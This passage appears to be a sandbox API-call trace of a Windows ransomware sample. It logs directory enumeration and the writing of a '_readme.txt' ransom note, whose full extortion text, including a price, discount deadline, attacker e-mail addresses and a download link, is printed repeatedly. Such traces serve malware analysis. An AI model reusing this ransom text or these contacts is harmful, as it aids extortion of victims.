ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0179.797] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 1 [0179.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42580 [0179.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0179.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425f0 | out: hHeap=0x2c0000) returned 1 [0179.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42580 | out: hHeap=0x2c0000) returned 1 [0179.797] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79a0 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42580 [0179.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79a0 | out: hHeap=0x2c0000) returned 1 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x498) returned 0x2adfa00 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79a0 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7bd0 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b80 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b58 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b08 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ae0 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ab8 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7888 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7838 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7978 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7dd8 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e00 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e28 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2adfeb8 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2adfef0 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2adff28 [0179.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2adff60 [0179.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0179.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a18 | out: hHeap=0x2c0000) returned 1 [0179.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79f0 | out: hHeap=0x2c0000) returned 1 [0179.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79c8 | out: hHeap=0x2c0000) returned 1 [0179.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7860 | out: hHeap=0x2c0000) returned 1 [0179.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7810 | out: hHeap=0x2c0000) returned 1 [0179.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad78d8 | out: hHeap=0x2c0000) returned 1 [0179.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7bf8 | out: hHeap=0x2c0000) returned 1 [0179.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7c20 | out: hHeap=0x2c0000) returned 1 [0179.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7c48 | out: hHeap=0x2c0000) returned 1 [0179.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7c70 | out: hHeap=0x2c0000) returned 1 [0179.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7c98 | out: hHeap=0x2c0000) returned 1 [0179.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7cc0 | out: hHeap=0x2c0000) returned 1 [0179.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ce8 | out: hHeap=0x2c0000) returned 1 [0179.803] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0179.803] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0179.803] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78b0 [0179.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.803] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.803] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0179.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.803] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.803] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.803] PathFindFileNameW (pszPath="") returned="" [0179.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0179.804] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0179.804] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0179.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0179.804] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0179.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0179.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0179.805] FreeLibrary (hLibModule=0x759a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0179.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x2ac4ee0 [0179.806] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0179.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.807] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0179.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0179.811] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.811] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0179.811] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0179.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0179.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.813] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*" (normalized: "c:\\boot\\cs-cz\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0179.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.814] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.814] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.814] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.814] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0179.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0179.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0179.815] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0179.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0179.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0179.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0179.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0179.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 